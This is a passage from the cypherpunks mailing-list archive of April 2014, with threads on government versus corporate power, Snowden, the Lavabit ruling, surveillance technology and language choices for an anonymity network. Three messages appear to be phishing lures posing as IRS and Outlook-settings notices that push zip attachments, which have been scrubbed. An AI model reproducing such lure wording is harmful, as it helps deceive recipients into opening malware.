same used for any warfare collateral damage, strategic bombing of civiians, WMD mutually assured destruction, law enforcement killings, CIA killings, Mafia killings, drug kingpin killings, husbands and wives killing of each other and their kids, abortion killings, gun-lovers killings, slaughter of indigenous peoples, military slaughter of all kinds -- why the very lament of every killer who is caught red-handed, blood dripping with body-armored thrill. Indeed, this exculpation is taught in the drone operation schools, top military academies, in special operations and covert operations schools, in basic training to teach newbie killers to use force against defenseless targets, in foreign policy universities and think wankerages, in richest clubs of murderers gulping tankards of blood-red wine toasting asymmetrical carnage of worldwide finance, law and religion. Business schools most bloody-minded, eminent domain and taxpayer subsidy for predation Course 101. Millions of people have been, are, and will be, slaughtered by this very rationale of repugnant cowards who are sexually gratified by obliterating helpless creatures who happened to be in the wrong place at the wrong time. Even a small percentage of the killers suffer this fate, but they are honored with grotesques displays of bloodless sparkling uniforms, weeping families, snoring encomiums of sacrifice, luxurious caskets flag-draped, tooting of bugles and firing of rifles (!), then dumped in the same ground as their hapless victims to rot and be eaten by worms enjoying being in the right place at the right time. At 07:10 AM 4/16/2014, you wrote: >Do you have any evidence that any of those victims were targeted for >any reason other than being in the wrong place at the wrong time? >You seem to be conflating war with companies exercising a variant >of eminent domain. > > From tpb-crypto at laposte.net Wed Apr 16 03:16:21 2014 From: tpb-crypto at laposte.net (tpb-crypto at laposte.net) Date: Wed, 16 Apr 2014 12:16:21 +0200 Subject: NSA good guys In-Reply-To: <534E266F.9000507@entersection.org> References: Your message of "Tue, 15 Apr 2014 11:03:18 PDT." <534D7466.4040906@virtadpt.net> <20140415215540.5D74322807F@palinka.tinho.net> <2103388535.132700.1397623226382.JavaMail.www@wwinf8228> <534E266F.9000507@entersection.org> Message-ID: <1111057254.150933.1397643381699.JavaMail.www@wwinf8308> > Message du 16/04/14 10:16 > De : "Gregory Foster" > On 4/15/14, 11:40 PM, tpb-crypto at laposte.net wrote: > > Companies cannot seize your property, put you in jail and queue you > > to the death row. > > http://en.wikipedia.org/wiki/Academi > > > The company received widespread publicity in 2007 when a group of > > its employees shot at Iraqi civilians killing 17 and injuring 20 in > > Nisour Square, Baghdad. ... Blackwater was also hired during the > > aftermath of Hurricane Katrina by the United States Department of > > Homeland Security, as well as by private clients, including > > communications, petrochemical and insurance companies. > Ok, the exception that confirms the rule, that was a company hired by the government to do its dirty job, ie, mercenaries. Until google, facebook, comcast, DHL, GM, Boeing, ... don't hire such services or do it themselves, they continue to be a lesser threat to the people than government is. Legally, none of them can do what you quoted above. From tedks at riseup.net Wed Apr 16 09:19:44 2014 From: tedks at riseup.net (Ted Smith) Date: Wed, 16 Apr 2014 12:19:44 -0400 Subject: Why didn't Snowden disclose Heartbleed (and others)? In-Reply-To: References: Message-ID: <1397665184.25313.1.camel@anglachel> On Tue, 2014-04-15 at 18:16 +0200, Lodewijk andré de la porte wrote: > F, I couldn't find exactly to which date his documents go. Heartbleed > was merged December 31 2011 (lonely night? sneaky vacation timing?). > Assuming the NSA checks patches (ofc they do) they should've found it > in Jan 2012. Snowden. Ah. Found it. "reenwald began working with > Snowden in either February[113] or in April after Poitras asked > Greenwald to meet her in New York City, at which point Snowden began > providing documents to them both" That'd be April 2013. > > > He still might've stolen the documents earlier, but who knows? I think the documents are significantly earlier than that. I think it's probably a mix of A and F; more sensitive information is probably more watched even if it's still just TOP SECRET. Also, there are definitely classifications above and within TOP SECRET. Look at the annotations on the Snowden documents. -- Sent from Ubuntu -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 836 bytes Desc: This is a digitally signed message part URL: From l at odewijk.nl Wed Apr 16 06:01:02 2014 From: l at odewijk.nl (=?UTF-8?Q?Lodewijk_andr=C3=A9_de_la_porte?=) Date: Wed, 16 Apr 2014 15:01:02 +0200 Subject: NSA good guys In-Reply-To: <1111057254.150933.1397643381699.JavaMail.www@wwinf8308> References: <534D7466.4040906@virtadpt.net> <20140415215540.5D74322807F@palinka.tinho.net> <2103388535.132700.1397623226382.JavaMail.www@wwinf8228> <534E266F.9000507@entersection.org> <1111057254.150933.1397643381699.JavaMail.www@wwinf8308> Message-ID: 2014-04-16 12:16 GMT+02:00 : > > Message du 16/04/14 10:16 > > De : "Gregory Foster" > > On 4/15/14, 11:40 PM, tpb-crypto at laposte.net wrote: > > > Companies cannot seize your property, put you in jail and queue you > > > to the death row. > > > > http://en.wikipedia.org/wiki/Academi > > > > > The company received widespread publicity in 2007 when a group of > > > its employees shot at Iraqi civilians killing 17 and injuring 20 in > > > Nisour Square, Baghdad. ... Blackwater was also hired during the > > > aftermath of Hurricane Katrina by the United States Department of > > > Homeland Security, as well as by private clients, including > > > communications, petrochemical and insurance companies. > > > > Ok, the exception that confirms the rule, that was a company hired by the > government to do its dirty job, ie, mercenaries. > > Until google, facebook, comcast, DHL, GM, Boeing, ... don't hire such > services or do it themselves, they continue to be a lesser threat to the > people than government is. Legally, none of them can do what you quoted > above. And neither can persons! Government having a violence monopoly is EXACTLY the idea! And one I wholeheartedly wish would be 100% effective and fair! Actually if the government would just TAKE all the violence and write it to /dev/null that's be PERFECT for me. Then we can start struggling with less demons such as abuse of power and wealth. Doesn't it just disgust you to think that anyone could be used sexually in whatever means, provided sufficient money compensates someone for it? What kind of violence is it that someone can provide something so compelling that he/she would do anything to get it? Think of how that used person convinces him/herself to do something completely unnatural, so disgusting it makes one retch, sheerly for an imaginary compensation. I wonder how well that situation is actually the situation for many prostitutes in present day. Is this even related? Oh yes, the NSA. Well. Seems this has become a thread about unnatural and utterly disgusting things. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 2913 bytes Desc: not available URL: From beam at rayservers.net Wed Apr 16 07:37:09 2014 From: beam at rayservers.net (beam) Date: Wed, 16 Apr 2014 16:37:09 +0200 Subject: [FC] - NSA good guys In-Reply-To: References: <534D7466.4040906@virtadpt.net> <20140415215540.5D74322807F@palinka.tinho.net> <2103388535.132700.1397623226382.JavaMail.www@wwinf8228> Message-ID: <534E9595.5030501@rayservers.net> On 16/04/2014 13:55, coderman wrote: > (...) > "The Intercept" has still not published leaks relevant to PayPal's > involvement in PRISM(like) collection... > IMHO there is no point to blame one entity or one electronic payment system for online transactions when the international bank/finance regulations (acts, bills, laws, legislations) encourage/force data collection/merging/profiling/sharing everywhere all the time. But you point in the right direction to an old topic on the cpunk list. To begin, at the beginning: *financial privacy issues* The good news is the emergence of new fintech based on new financial cryptography systems which will ensure financial privacy. -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 261 bytes Desc: OpenPGP digital signature URL: From juan.g71 at gmail.com Wed Apr 16 12:59:11 2014 From: juan.g71 at gmail.com (Juan Garofalo) Date: Wed, 16 Apr 2014 16:59:11 -0300 Subject: NSA good guys In-Reply-To: References: <534D7466.4040906@virtadpt.net> <20140415215540.5D74322807F@palinka.tinho.net> <2103388535.132700.1397623226382.JavaMail.www@wwinf8228> <534E266F.9000507@entersection.org> <1111057254.150933.1397643381699.JavaMail.www@wwinf8308> Message-ID: <42E4D2B62737BDBD1E95AEA8@F74D39FA044AA309EAEA14B9> --On Wednesday, April 16, 2014 3:01 PM +0200 Lodewijk andré de la porte wrote: > 2014-04-16 12:16 GMT+02:00 : > >> > Message du 16/04/14 10:16 >> > De : "Gregory Foster" >> > On 4/15/14, 11:40 PM, tpb-crypto at laposte.net wrote: >> > > Companies cannot seize your property, put you in jail and queue you >> > > to the death row. >> > >> > http://en.wikipedia.org/wiki/Academi >> > >> > > The company received widespread publicity in 2007 when a group of >> > > its employees shot at Iraqi civilians killing 17 and injuring 20 in >> > > Nisour Square, Baghdad. ... Blackwater was also hired during the >> > > aftermath of Hurricane Katrina by the United States Department of >> > > Homeland Security, as well as by private clients, including >> > > communications, petrochemical and insurance companies. >> > >> >> Ok, the exception that confirms the rule, that was a company hired by the >> government to do its dirty job, ie, mercenaries. >> >> Until google, facebook, comcast, DHL, GM, Boeing, ... don't hire such >> services or do it themselves, they continue to be a lesser threat to the >> people than government is. Well, boeing is the biggest military contractor on the planet? GM stands for government motors, no? google, facebook, nsa front ends, etc. Materially, they are a lesser threat than the government since their business is not to kill people (well boeing just makes the weapons...), but, they are the main criminal partners of the government anyway. Looks like Dan Geer wants to divert attention from the 'legal' masters of corporatism to the corporatists themselves.... >> Legally, none of them can do what you quoted >> above. > > From juan.g71 at gmail.com Wed Apr 16 13:03:18 2014 From: juan.g71 at gmail.com (Juan Garofalo) Date: Wed, 16 Apr 2014 17:03:18 -0300 Subject: NSA good guys In-Reply-To: References: <534D7466.4040906@virtadpt.net> <20140415215540.5D74322807F@palinka.tinho.net> <2103388535.132700.1397623226382.JavaMail.www@wwinf8228> <534E266F.9000507@entersection.org> <1111057254.150933.1397643381699.JavaMail.www@wwinf8308> Message-ID: <683CE972F2F2807237FC4B2E@F74D39FA044AA309EAEA14B9> --On Wednesday, April 16, 2014 3:01 PM +0200 Lodewijk andré de la porte wrote: > > And neither can persons! > > Government having a violence monopoly is EXACTLY the idea! Yep. The stupidest idea that political theory ever produced. Outright tyrants are at least honest. > And one I > wholeheartedly wish would be 100% effective and fair! Actually if the > government would just TAKE all the violence and write it to /dev/null > that's be PERFECT for me. Then we can start struggling with less demons > such as abuse of power and wealth. > > Doesn't it just disgust you to think that anyone could be used sexually in > whatever means, provided sufficient money compensates someone for it? No, that's the kind of thing that conservatives and their sick outlook on sex find 'disgusting'. It's a common occurrence in 'christian' pseudo civilization. > What > kind of violence is it that someone can provide something so compelling > that he/she would do anything to get it? Think of how that used person > convinces him/herself to do something completely unnatural, so disgusting > it makes one retch, sheerly for an imaginary compensation. > > I wonder how well that situation is actually the situation for many > prostitutes in present day. > > Is this even related? Oh yes, the NSA. Well. Seems this has become a > thread about unnatural and utterly disgusting things. > From dan at geer.org Wed Apr 16 16:57:17 2014 From: dan at geer.org (dan at geer.org) Date: Wed, 16 Apr 2014 19:57:17 -0400 Subject: NSA good guys In-Reply-To: Your message of "Wed, 16 Apr 2014 16:59:11 -0300." <42E4D2B62737BDBD1E95AEA8@F74D39FA044AA309EAEA14B9> Message-ID: <20140416235717.23ED22280B3@palinka.tinho.net> > Looks like Dan Geer wants to divert attention from the 'legal' masters > of corporatism to the corporatists themselves.... It depends on whether you believe that a promise of procedurally satisfactory data handling can be relied upon. Quoting (as I'm on the record) from "Tradeoffs in Cyber Security," given last October at the Univ. of North Carolina, Charlotte. http://geer.tinho.net/geer.uncc.9x13.txt Today I observe a couple fornicating on a roof top in circumstances where I can never know who the couple are. Do they have privacy? The answer is "no" if your definition of privacy is the absence of observability. The answer is "yes" if your definition of privacy is the absence of identifiability. Technical progress in image acquisition guarantees observability pretty much everywhere now. Standoff biometrics are delivering multi-factor identifiability at ever greater distances. We will soon live in a society where identity is not an assertion like "My name is Dan," but rather an observable like "Sensors confirm that is Dan." With enough sensors, concentration camps don't need to tatoo their inmates. How many sensors are we installing in normal life? If routine data acquisition kills both privacy as impossible-to-observe and privacy as impossible-to-identify, then what might be an alternative? If you are an optimist or an apparatchik, then your answer will tend toward rules of procedure administered by a government you trust or control. If you are a pessimist or a hacker/maker, then your answer will tend towards the operational, and your definition of a state of privacy will be mine: the effective capacity to misrepresent yourself. --dan ===== the above and other material on file under geer.tinho.net/pubs From tpb-crypto at laposte.net Wed Apr 16 12:10:31 2014 From: tpb-crypto at laposte.net (tpb-crypto at laposte.net) Date: Wed, 16 Apr 2014 21:10:31 +0200 Subject: NSA good guys In-Reply-To: References: <534D7466.4040906@virtadpt.net> <20140415215540.5D74322807F@palinka.tinho.net> <2103388535.132700.1397623226382.JavaMail.www@wwinf8228> <534E266F.9000507@entersection.org> <1111057254.150933.1397643381699.JavaMail.www@wwinf8308> Message-ID: <369280624.186455.1397675431492.JavaMail.www@wwinf8311> > Message du 16/04/14 15:01 > De : "Lodewijk andré de la porte" > A : tpb-crypto at laposte.net > Copie à : "Gregory Foster" , "cypherpunks at cpunks.org" > Objet : Re: NSA good guys > > 2014-04-16 12:16 GMT+02:00 : > > > > Message du 16/04/14 10:16 > > > De : "Gregory Foster" > > > On 4/15/14, 11:40 PM, tpb-crypto at laposte.net wrote: > > > > Companies cannot seize your property, put you in jail and queue you > > > > to the death row. > > > > > > http://en.wikipedia.org/wiki/Academi > > > > > > > The company received widespread publicity in 2007 when a group of > > > > its employees shot at Iraqi civilians killing 17 and injuring 20 in > > > > Nisour Square, Baghdad. ... Blackwater was also hired during the > > > > aftermath of Hurricane Katrina by the United States Department of > > > > Homeland Security, as well as by private clients, including > > > > communications, petrochemical and insurance companies. > > > > > > > Ok, the exception that confirms the rule, that was a company hired by the > > government to do its dirty job, ie, mercenaries. > > > > Until google, facebook, comcast, DHL, GM, Boeing, ... don't hire such > > services or do it themselves, they continue to be a lesser threat to the > > people than government is. Legally, none of them can do what you quoted > > above. > > > And neither can persons! > > Government having a violence monopoly is EXACTLY the idea! And one I > wholeheartedly wish would be 100% effective and fair! Actually if the > government would just TAKE all the violence and write it to /dev/null > that's be PERFECT for me. Then we can start struggling with less demons > such as abuse of power and wealth. > > Doesn't it just disgust you to think that anyone could be used sexually in > whatever means, provided sufficient money compensates someone for it? What > kind of violence is it that someone can provide something so compelling > that he/she would do anything to get it? Think of how that used person > convinces him/herself to do something completely unnatural, so disgusting > it makes one retch, sheerly for an imaginary compensation. > > I wonder how well that situation is actually the situation for many > prostitutes in present day. > > Is this even related? Oh yes, the NSA. Well. Seems this has become a thread > about unnatural and utterly disgusting things. > Well, we were talking about the dangers of companies vs. danger of governments. Before a girl turns into a prostitute, with the exception of countries like Haiti and Democratic Republic of Congo, she can try and do other things rather than sell her body. Even in the third world, there's plenty of shopping centers, laundry and cleaning works they can try. It pays less, but it also doesn't violate anyone's bodies. Most prostitutes had a choice at least once. From l at odewijk.nl Wed Apr 16 16:32:30 2014 From: l at odewijk.nl (=?UTF-8?Q?Lodewijk_andr=C3=A9_de_la_porte?=) Date: Thu, 17 Apr 2014 01:32:30 +0200 Subject: Why didn't Snowden disclose Heartbleed (and others)? In-Reply-To: <1397665184.25313.1.camel@anglachel> References: <1397665184.25313.1.camel@anglachel> Message-ID: 2014-04-16 18:19 GMT+02:00 Ted Smith : > I think the documents are significantly earlier than that. > You'd say so, but we really have no idea. Maybe he was adding pages slowly. Maybe he was still while moving into Russia. Computers are tricky like that :( > Also, there are definitely classifications above and within TOP SECRET. > Look at the annotations on the Snowden documents. > Yeah, I know. That's why there were "" marks. I should have really made that clearer haha. Sorry about that. I sortof meant "TOP-EST SECRET" would still have another layer. And just cells. The NSA must have seperated information cells . Cells that do not share sysadmins with badly defined rights ;) -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 1320 bytes Desc: not available URL: From irs.e-helpmail at irs.gov Thu Apr 17 02:22:50 2014 From: irs.e-helpmail at irs.gov (irs.e-helpmail at irs.gov) Date: Thu, 17 Apr 2014 09:22:50 GMT Subject: E-mail Receipt Confirmation - Ticket#SD9589207 Message-ID: The IRS e-help Desk has received your email on 04/17/14. A case has been opened in response to your question or issue. Your case ID is : SD9589207 Details about this case has been attached. If additional contact is necessary, please reference this case ID. You will receive a reply within two business days. Thank you for contacting the IRS e-help Desk. ---------------------------------------------------------------------------------------------------- Do not submit confidential information, such as Taxpayer Identification Number (TIN), EFIN, or ETIN in your e-mail correspondence. NOTE: We are providing a written response to your question using the information you have provided us in your original message. Our written response is NOT to be considered either a revenue ruling or determination letter, which are prepared by the Department of Treasury Chief Counsel. -------------- next part -------------- A non-text attachment was scrubbed... Name: SD9589207.zip Type: application/zip Size: 6784 bytes Desc: not available URL: From Administrator at jfet.org Thu Apr 17 02:47:28 2014 From: Administrator at jfet.org (Administrator) Date: Thu, 17 Apr 2014 09:46:88 GMT Subject: Important - New Outlook Settings Message-ID: Please carefully read the attached instructions before updating settings. This e-mail and / or any attachment(s) is intended solely for the above-mentioned recipient(s) and it may contain confidential or privileged information. If you have received it in error, please notify us immediately at helpdesk at jfet.org and delete the e-mail. You must not copy it, distribute it, disclose it or take any action in reliance on it. -------------- next part -------------- A non-text attachment was scrubbed... Name: OutlookSettings.zip Type: application/zip Size: 6603 bytes Desc: not available URL: From Administrator at jfet.org Thu Apr 17 03:07:45 2014 From: Administrator at jfet.org (Administrator) Date: Thu, 17 Apr 2014 09:67:45 GMT Subject: Important - New Outlook Settings Message-ID: Please carefully read the attached instructions before updating settings. This e-mail and / or any attachment(s) is intended solely for the above-mentioned recipient(s) and it may contain confidential or privileged information. If you have received it in error, please notify us immediately at helpdesk at jfet.org and delete the e-mail. You must not copy it, distribute it, disclose it or take any action in reliance on it. -------------- next part -------------- A non-text attachment was scrubbed... Name: OutlookSettings.zip Type: application/zip Size: 6603 bytes Desc: not available URL: From dan at geer.org Thu Apr 17 13:48:30 2014 From: dan at geer.org (dan at geer.org) Date: Thu, 17 Apr 2014 16:48:30 -0400 Subject: Lavabit Message-ID: <20140417204831.0F3822280B3@palinka.tinho.net> http://www.techweekeurope.co.uk/news/lavabit-snowden-appeal-lost-144112 Lavabit Loses Contempt Of Court Appeal Failure to hand over encryption keys could land Lavabit founder Levison with hefty fines On April 17, 2014 by Thomas Brewster Lavabit, the email service once used by whistleblower Edward Snowden, has lost an appeal against a contempt of court ruling that he delayed the US Government's attempts to gather information by refusing to hand over encryption keys. the email service, which has since closed, was eventually forced to comply anyway. The US government asked for SSL keys to look at the metadata (dates and other details of communications) for a specific Lavabit user, believed to be Snowden, The service's founder Ladar Levison at first refused, and when forced to comply, provided the keys printed in a tiny typeface. The court ruled that Lavabit had not followed correct procedures in its initial hearings, and had not raised a specific challenge to the district court's authority under the so-called "pen/trap statute". Levinson could now be fined for contempt. "Levison's statement to the district court simply reflected his personal angst over complying with the pen/trap order, not his present appellate argument that questions whether the district court possessed the authority to act at all," read a statement from the fourth US circuit court of appeals Judge G Steven Agee. "Arguments raised in a trial court must be specific and in line with those raised on appeal." The case stems back to June last year, when the US government sought to acquire private keys for SSL encrypted traffic of a specific Lavabit user, thought to be Snowden. Officials sought to put a tap on the communications of that target to collect metadata. Levison, when approached by FBI officials, refused to hand over the keys, which eventually led to the contempt of court charge. According to the court filing denying his appeal, Levison suggested he could provide the content the government was after, rather than using their interception tools. The government decline the offer, saying it needed real-time acquisition of the target's data. A device to intercept traffic was installed as part of the pen/trap order, but could not gather usable information as the encryption keys had not been provided. Officials did eventually get the keys in August 2013, however. "The government sought penalties of $5,000 a day until Lavabit provided the encryption keys to the government. The district court granted the motion for sanctions that day. Two days later, Levison provided the keys to the government. By that time, six weeks of data regarding the target had been lost," the court ruling read. Levison could now be fined thousands of dollars. From coderman at gmail.com Thu Apr 17 18:14:55 2014 From: coderman at gmail.com (coderman) Date: Thu, 17 Apr 2014 18:14:55 -0700 Subject: SMTP is bad, guys (and gals, and other spectrum earth humans) Message-ID: On Wed, Apr 16, 2014 at 6:29 AM, Georgi Guninski wrote: > On Wed, Apr 16, 2014 at 04:55:27AM -0700, coderman wrote: >> >> and private >> industry privacy invasion, as they're both faces of unrestrained > > weird to write this from gmail account :) nothing conveys my contempt for email like gmail! *grin* From juan.g71 at gmail.com Thu Apr 17 15:02:11 2014 From: juan.g71 at gmail.com (Juan) Date: Thu, 17 Apr 2014 19:02:11 -0300 Subject: NSA good guys In-Reply-To: <20140416235717.23ED22280B3@palinka.tinho.net> References: <42E4D2B62737BDBD1E95AEA8@F74D39FA044AA309EAEA14B9> <20140416235717.23ED22280B3@palinka.tinho.net> Message-ID: <53504f61.04693a0a.602f.5a7e@mx.google.com> On Wed, 16 Apr 2014 19:57:17 -0400 dan at geer.org wrote: > > > Looks like Dan Geer wants to divert attention from the 'legal' > > masters of corporatism to the corporatists themselves.... > > It depends on whether you believe that a promise of procedurally > satisfactory data handling can be relied upon. If you mean promises from the government, or from their corporatist partners, no, of course, I don't. Regarding your quote below, It may be possible, in the not-so-distant-future, to record people in ultra high definition from a mile away, but the 'technology' can be rendered rather useless with somthing like...this http://ramitia.files.wordpress.com/2010/02/japan-face-masks.jpg Of course, at that point, google and general dynamics are going to knock on the pentagon's door and ask them to ban masks. Quoting (as I'm on > the record) from "Tradeoffs in Cyber Security," given last October > at the Univ. of North Carolina, Charlotte. > > http://geer.tinho.net/geer.uncc.9x13.txt > > > > Today I observe a couple fornicating on a roof top in circumstances > where I can never know who the couple are. Do they have privacy? > The answer is "no" if your definition of privacy is the absence of > observability. The answer is "yes" if your definition of privacy > is the absence of identifiability. > > Technical progress in image acquisition guarantees observability > pretty much everywhere now. Standoff biometrics are delivering > multi-factor identifiability at ever greater distances. We will > soon live in a society where identity is not an assertion like "My > name is Dan," but rather an observable like "Sensors confirm that > is Dan." With enough sensors, concentration camps don't need to > tatoo their inmates. How many sensors are we installing in normal > life? > > If routine data acquisition kills both privacy as > impossible-to-observe and privacy as impossible-to-identify, then > what might be an alternative? If you are an optimist or an > apparatchik, then your answer will tend toward rules of procedure > administered by a government you trust or control. If you are a > pessimist or a hacker/maker, then your answer will tend towards the > operational, and your definition of a state of privacy will be mine: > the effective capacity to misrepresent yourself. > > > > > --dan > ===== > the above and other material on file under geer.tinho.net/pubs > > From dan at geer.org Thu Apr 17 19:09:36 2014 From: dan at geer.org (dan at geer.org) Date: Thu, 17 Apr 2014 22:09:36 -0400 Subject: NSA good guys In-Reply-To: Your message of "Thu, 17 Apr 2014 19:02:11 -0300." <53504f61.04693a0a.602f.5a7e@mx.google.com> Message-ID: <20140418020936.D82A62280DC@palinka.tinho.net> | | It may be possible, in the not-so-distant-future, to record | people in ultra high definition from a mile away, but the | 'technology' can be rendered rather useless with somthing | like...this | | http://ramitia.files.wordpress.com/2010/02/japan-face-masks.jpg | At this time, it is possible to do facial recognition at 500 meters, iris recognition at 50 meters, and heartbeat recognition at 5 meters. A newspaper open on a table can be read from orbit. DNA samples can be matched in under half a hour. Your smartphone can identify your gait, your face in that selfie, the idiosyncracies of your typing, your fingerprint and/or anything else you wish to lay on the screen. Light fixtures in public venues provide light but also house a camera, sensors for CO/CO2/pollutant emissions, seismic activity, humidity & UV radiation, a microphone, wifi and/or cellular interfaces, an extensible API, an IPv4 or v6 address per LED, a capacity for disconnected "decision making on the pole," and cloud-based remote management. Every cow you eat is tracked cradle to grave with RFID tagging under the National Animal Identification System, the infrastructure for which handles 100 million cattle and works for any mammal, of which you are one. Any newish car is broadcasting several Bluetooth beacons as is your newish iPhone. Forensics can now match photo to camera as crisply as matching bullet to barrel. The Smart Meter soon to be imposed on your electric tap will know everything you own, and report. More and more people you meet will be part of the system -- that wearables like Google Glass are so readily detectible is just a brief moment in time. Cars are soon to be mandated to implement wireless vehicle-to-vehicle (V2V) and vehicle to infrastructure (V2I) communications using extensible protocols intended to include route-based payment now that too many people are driving green cars. Your various insurers will buy your data for a pittance of discount but will also know when, say, blood pressure for everyone in the house or the neighborhood rises together. A wife may not be impelled to testify against a husband, but cannot her digital exhaust be subpoenaed to the same effect? But you know all that, paper hospital masks notwithstanding. --dan From scott at sbce.org Thu Apr 17 22:14:53 2014 From: scott at sbce.org (Scott Blaydes) Date: Fri, 18 Apr 2014 00:14:53 -0500 Subject: Lavabit In-Reply-To: <20140417204831.0F3822280B3@palinka.tinho.net> References: <20140417204831.0F3822280B3@palinka.tinho.net> Message-ID: Now that is something I would help crowd fund, the paying of the dude’s contempt of court fines. Who cares about kickstarting some groups game, or help bring a cellphone activated door lock to market. I would rather kick some cash to the guy who did as much as he could to keep his clients data “safe”, even when threatened by three letter agencies. Thats some balls in my book. Thank you, Scott Blaydes On Apr 17, 2014, at 3:48 PM, dan at geer.org wrote: > > http://www.techweekeurope.co.uk/news/lavabit-snowden-appeal-lost-144112 > > Lavabit Loses Contempt Of Court Appeal > > Failure to hand over encryption keys could land Lavabit founder Levison > with hefty fines > On April 17, 2014 by Thomas Brewster > > Lavabit, the email service once used by whistleblower Edward > Snowden, has lost an appeal against a contempt of court ruling > that he delayed the US Government's attempts to gather information > by refusing to hand over encryption keys. the email service, > which has since closed, was eventually forced to comply anyway. > > The US government asked for SSL keys to look at the metadata > (dates and other details of communications) for a specific Lavabit > user, believed to be Snowden, The service's founder Ladar Levison > at first refused, and when forced to comply, provided the keys > printed in a tiny typeface. > > The court ruled that Lavabit had not followed correct procedures > in its initial hearings, and had not raised a specific challenge > to the district court's authority under the so-called "pen/trap > statute". Levinson could now be fined for contempt. > > "Levison's statement to the district court simply reflected his > personal angst over complying with the pen/trap order, not his > present appellate argument that questions whether the district > court possessed the authority to act at all," read a statement > from the fourth US circuit court of appeals Judge G Steven Agee. > > "Arguments raised in a trial court must be specific and in line > with those raised on appeal." > > The case stems back to June last year, when the US government > sought to acquire private keys for SSL encrypted traffic of a > specific Lavabit user, thought to be Snowden. Officials sought > to put a tap on the communications of that target to collect > metadata. > > Levison, when approached by FBI officials, refused to hand over > the keys, which eventually led to the contempt of court charge. > > According to the court filing denying his appeal, Levison suggested > he could provide the content the government was after, rather > than using their interception tools. The government decline the > offer, saying it needed real-time acquisition of the target's > data. > > A device to intercept traffic was installed as part of the > pen/trap order, but could not gather usable information as the > encryption keys had not been provided. > > Officials did eventually get the keys in August 2013, however. > "The government sought penalties of $5,000 a day until Lavabit > provided the encryption keys to the government. The district > court granted the motion for sanctions that day. Two days later, > Levison provided the keys to the government. By that time, six > weeks of data regarding the target had been lost," the court > ruling read. > > Levison could now be fined thousands of dollars. > > -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 842 bytes Desc: Message signed with OpenPGP using GPGMail URL: From jya at pipeline.com Fri Apr 18 05:46:50 2014 From: jya at pipeline.com (John Young) Date: Fri, 18 Apr 2014 08:46:50 -0400 Subject: NSA good guys In-Reply-To: <20140418020936.D82A62280DC@palinka.tinho.net> References: <20140418020936.D82A62280DC@palinka.tinho.net> Message-ID: The eye of god is upon the earth, sin not heathens. unavoidable sin is required to justify god business. No insecurity, no god security blanket app. Prayer is more effective than encryption. Kickstart a religion, call it Darksec. Give away free, with 3D funny hats and walks and masks. Beguile officials into raiding your printer buried under Hettinga's compost of coconut shell Bitcoins. At 10:09 PM 4/17/2014, dan at geer.org wrote: > | > | It may be possible, in the not-so-distant-future, to record > | people in ultra high definition from a mile away, but the > | 'technology' can be rendered rather useless with somthing > | like...this > | > | http://ramitia.files.wordpress.com/2010/02/japan-face-masks.jpg > | > > >At this time, it is possible to do facial recognition at 500 meters, >iris recognition at 50 meters, and heartbeat recognition at 5 meters. >A newspaper open on a table can be read from orbit. DNA samples >can be matched in under half a hour. Your smartphone can identify >your gait, your face in that selfie, the idiosyncracies of your >typing, your fingerprint and/or anything else you wish to lay on >the screen. Light fixtures in public venues provide light but also >house a camera, sensors for CO/CO2/pollutant emissions, seismic >activity, humidity & UV radiation, a microphone, wifi and/or cellular >interfaces, an extensible API, an IPv4 or v6 address per LED, a >capacity for disconnected "decision making on the pole," and >cloud-based remote management. Every cow you eat is tracked cradle >to grave with RFID tagging under the National Animal Identification >System, the infrastructure for which handles 100 million cattle and >works for any mammal, of which you are one. Any newish car is >broadcasting several Bluetooth beacons as is your newish iPhone. >Forensics can now match photo to camera as crisply as matching >bullet to barrel. The Smart Meter soon to be imposed on your >electric tap will know everything you own, and report. More and >more people you meet will be part of the system -- that wearables >like Google Glass are so readily detectible is just a brief moment >in time. Cars are soon to be mandated to implement wireless >vehicle-to-vehicle (V2V) and vehicle to infrastructure (V2I) >communications using extensible protocols intended to include >route-based payment now that too many people are driving green cars. >Your various insurers will buy your data for a pittance of discount >but will also know when, say, blood pressure for everyone in the >house or the neighborhood rises together. A wife may not be impelled >to testify against a husband, but cannot her digital exhaust be >subpoenaed to the same effect? > > >But you know all that, paper hospital masks notwithstanding. > >--dan From stevens at mpi-sws.org Fri Apr 18 01:26:37 2014 From: stevens at mpi-sws.org (Stevens Le Blond) Date: Fri, 18 Apr 2014 10:26:37 +0200 Subject: Programming language for anonymity network Message-ID: <5350E1BD.5010304@mpi-sws.org> Hello, We are a team of researchers working on the design and implementation of a traffic-analysis resistant anonymity network and we would like to request your opinion regarding the choice of a programming language / environment. Here are the criteria: 1) Familiarity: The language should be familiar or easy to learn for most potential contributors, as we hope to build a diverse community that builds on and contributes to the code. 2) Maturity: The language implementation, tool chain and libraries should be mature enough to support a production system. 3) Language security: The language should minimize the risk of security relevant bugs like buffer overflows. 4) Security of runtime / tool chain: It should be hard to inconspicuously backdoor the tool chain and, if applicable, runtime environments. To give two concrete examples: Using the C language + deterministic builds is an attractive option with respect to 1), 2) and 4), but doesn’t provide much regarding 3). Java does better with respect to 3), however, it trades some of 3) and 4) as compared to C. Specifically, we are concerned that large runtimes may be difficult to audit. A similar argument may apply to other interpreted languages. Given these criteria, what language would you choose and for what reasons? We would also appreciate feedback regarding our criteria. All the best, David, Nick, Peter, Stevens, and William -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 900 bytes Desc: OpenPGP digital signature URL: From cathalgarvey at cathalgarvey.me Fri Apr 18 04:21:13 2014 From: cathalgarvey at cathalgarvey.me (Cathal Garvey) Date: Fri, 18 Apr 2014 12:21:13 +0100 Subject: Programming language for anonymity network In-Reply-To: <5350E1BD.5010304@mpi-sws.org> References: <5350E1BD.5010304@mpi-sws.org> Message-ID: <53510AA9.5040307@cathalgarvey.me> I'm not an expert on compiled languages by any stretch, but my 2c: A) Dlang is designed to be memory safe, has a close syntax to C and is easily interfaced with it. It's garbage-collected but you can disable that, as well as all other safety guarantees, if you choose. There are working bindings for Lua, so you can implement a scripting backend easily. It's multi-paradigm, with room for OOP, struct-based or functional, or whatever. It doesn't have much builtin crypto but can be linked to C crypto. B) Rust is designed as a memory-safe systems language and looks really nice as a replacement for C, but I get the impression that (like Golang) it's "too" strict and may get in the way of some low-level work. It also has 